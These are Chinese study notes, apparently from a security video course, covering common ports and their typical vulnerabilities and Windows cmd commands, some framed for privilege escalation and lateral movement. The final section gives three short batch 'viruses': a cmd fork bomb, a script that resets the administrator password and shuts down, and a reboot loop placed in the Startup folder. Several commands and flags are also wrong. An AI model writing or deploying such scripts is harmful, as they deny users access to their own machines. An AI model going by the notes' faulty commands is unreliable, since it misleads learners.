以下笔记学习来自B站泷羽Sec:
B站泷羽Sec
1.常见端口对应服务
ftp 21: 文件传输协议,可能存在缓冲区溢出漏洞,暴力破解
telnet 23:远程终端协议,可以使用一些远程连接工具做一些弱口令的爆破
web 80(80-89都有可能是web):TCP(传输控制协议)和 UDP(用户数据报协议)协议中的一个端口号。可能出现DDoS(分布式拒绝服务)攻击等。
443:互联网上用于超文本传输安全协议(HTTPS)服务的默认端口。可能出现ssl心脏滴血漏洞以及web漏洞测试。可能出现中间人攻击漏洞等
smb 445:Server Message Block,是一种网络文件共享协议,它允许网络上的计算机相互访问共享的文件、打印机等资源。可能出现恶意文件注入与执行,远程控制漏洞
mssql 1433:Microsoft SQL Server 数据库管理系统的默认端口。可能出现弱口令,sql注入漏洞等。
oracle 1521:Oracle 数据库监听器的默认端口。可能出现暴力破解,sql注入漏洞等。
2082/2083 cpanel:主机管理登录系统(国外居多)。可能出现XSS,弱口令漏洞等。
2222 :虚拟主机管理登录系统
3218:squid代理默认端口-漫游内网
3306 mysql:数据库管理系统的默认端口。可能出现弱口令,SQL注入漏洞等
3312/3311:kangle主机管理系统登录
3389:Windows 远程桌面(RDP)的服务端口,可能出现远程代码执行漏洞
5432:postgreSQL数据库默认监听端口,可能出现SQL注入,未授权等漏洞
5900:虚拟网络计算(vnc),可能有弱口令或者暴力破解漏洞
6379:redis,可能出现未授权,远程代码执行漏洞
7001/7002:weblogic,可能出现默认弱口令,反序列化等漏洞
7778:kloxo,主机控制面板登录,可能出现Oracle应用服务器漏洞
8000-9090:一些常见的web端口,有些运维喜欢把管理后台开到这些非80端口上面
8080:tomcat,wdcp主机管理系统,可能存在默认弱口令漏洞
8080,8089,9090:jboss
8083:vestacp,主机管理系统
8649:ganglia,Ganglia 是一个开源的集群监视项目,主要用于监控系统性能,如 CPU、内存、硬盘利用率、I/O 负载、网络流量情况等。可能出现未授权,信息泄露漏洞等
8888:宝塔,主机管理默认端口,一款在服务器管理领域广泛使用的服务器运维管理软件。它提供了便捷的可视化操作界面,让用户可以轻松地对服务器进行各种管理操作,比如网站搭建、数据库管理、文件管理、服务器性能监控等等。无论是个人开发者搭建小型网站,还是企业运维人员管理服务器集群,宝塔面板都能在一定程度上简化操作流程,提高工作效率。
10000:virtuamin/webmin服务器虚拟主机管理系统,可能出现未授权,远程代码执行等漏洞
11211:memcache,Memcached 是一个高性能的分布式内存对象缓存系统,用于通过减轻数据库负载来加速动态 Web 应用程序。可能出现缓存投毒,未授权等漏洞
27017/27018:mongodb数据库,可能出现未授权漏洞
28071:mongodb,统计系统页面
2. cmd命令
2.1 echo
查看echo帮助的提示
echo /?
输出文本
echo 文本
输出文本并重定向到1.txt文件中
echo 文本 > 1.txt
把文本追加到1.txt中
echo 文本 >> 1.txt
如果再用一次就会把原先文件内的文本覆盖掉
2.2 切换文件夹
展示当前目录下的文件
dir
切换到指定盘符
D: C:
进入到当前目录
cd .
回退到上一级目录
cd ..
2.3 tree文件树状图
/f:显示每个文件夹中的名称
/a:使用ascii字符显示,而不使用扩展字符(可以有效解决乱码)
在渗透测试中比较常用
2.4 md创建目录和rd删除目录
md是mkdir的缩写,作用一样
创建一个名为111的文件夹
mk 111
删除111文件夹
rd 111
tab有补全功能
2.5 ipconfig
显示当前的网络状态,IP配置,一般用这个命令查看网络本机IP地址,排查网络问题
把所有本机的网络信息打印出来
ipconfig /all
2.6 cls
清屏
2.7 copy 复制拼接文件
把文件1.txt复制到上一级目录
copy 1.txt ..\1.txt
把admin文件夹中的1.txt复制到桌面并重命名为2.txt
copy amdin\1.txt Desktop\2.txt
把1.txt中的内容和2.txt的内容拼接起来,并重定向到3.txt中
copy 1.txt + 2.txt > 3.txt
2.8 move
把上一级目录中的1.txt移动到本级目录,并且重命名为4.txt
move ..\1.txt 4.txt
2.9 ren重命名
把1.txt重命名为2.txt
ren 1.txt 2.txt
2.10 del删除
删除1,2,3.txt
del 1.txt 2.txt 3.txt
!注:del命令所删除的文件是永久删除,不回进入回收站
2.11 ping
一般用于探测主机ip是否存活
一直ping
ping ip -t
2.12 type
显示文本文件的内容
type 1.txt
2.13 reg
用于操作 Windows 注册表的一个重要工具
2.14 nslookup
用于探测域名信息
nslookup www.baidu.com
查看历史解析记录
nslookup -d www.baidu.com
2.15 find查找
在1.txt中查找带a的字段
find "a" 1.txt
查找a参数字段并排序行号
find /n "a" 1.txt
可以将type与find结合使用
查看1.txt的内容并输出带有a参数的字段并排序行号
type 1.txt | find /n "a"
2.16 tasklist任务列表
显示当前的进程名称等信息
2.17 taskkill
用于杀死进程
常用参数一般是-pid,-f,-t
例如:首先开启一个计算器进程,使用taskkill杀死计算器进程
假如遇见杀不掉的进程加一个-f即可
2.18 ver,winver显示版本
ver会在cmd上显示版本信息
winver会弹出一个窗口显示版本信息
2.19 start启动开始命令
启动计算器
start calc
启动ping并执行-t参数
start ping www.baidu.com -t
2.20 systeminfo
查看整个系统的信息
用于查看一些比较重要的信息,比如说补丁信息,后期在提权过程中就是针对一些不同的修补程序进行一个提权,例如它少打了哪些补丁就可以利用少打的补丁进行提权。(溢出系统提权)
2.11 logoff注销
后期提权成功的情况下要远程登录3389桌面的话,有可能有的机器是连接状态,可以利用这个命令把对方的远程登录注销掉(这个是暴力方式,也可以用其他的方法挤掉对方)
2.22 shutdown
/s 在一分钟内关机
/a 计划取消
/r 重启
/g 在一分钟内关机
/r /t 0 /t用于设置时间,设置为0则为立即执行
2.23 telnet协议工具
要使用此工具需要:
控制面板——程序——打卡或关闭Windows功能——telnet客户端勾选
之后在cmd中输入telnet若进入该该工具则成功
2.24 arp地址解析协议
自己ip和物理机的映射关系表
若拿下一台内网机器通过这条命令可以查看当前内网有哪些主机以助于横向移动,用于发现同一网络中有哪些主机
arp -a
2.25 at定时任务
定时关机
at 时间 "shutdown /r /t 0"
取消命令
at 1 /delete
2.26 net服务
关闭telnet
net stop telnet
开启telnet
net start telnet
查看当前用户
net user
添加用户名为admin,密码为123的用户
net user admin 123 /add
查看admin用户权限
net user admin
查看管理员用户权限
net user administrator
怎么把admin变成管理员权限
net localgroup administrator admin /add(提权)
删除用户
net user admin /delete
3. 利用cmd编写bat病毒
3.1 资源耗尽病毒
echo start cmd > 1.txt
echo %0 >> 1.txt //%0指点脚本本身,在此处就会无限启动本身,即无限启动cmd窗口
ren 1.txt 1.bat
3.2 锁机病毒
echo net user administrator 123456 > c:\windows\Temp\1.bat
echo shutdown /n /t 0 >> c:\windows\Temp\1.bat
3.3 无限重启病毒
echo shutdown /n /t 0 > c:\windows\Temp\1.bat
copy c:\windows\Temp\1.bat “%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup”
“%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup”
是开机自启目录
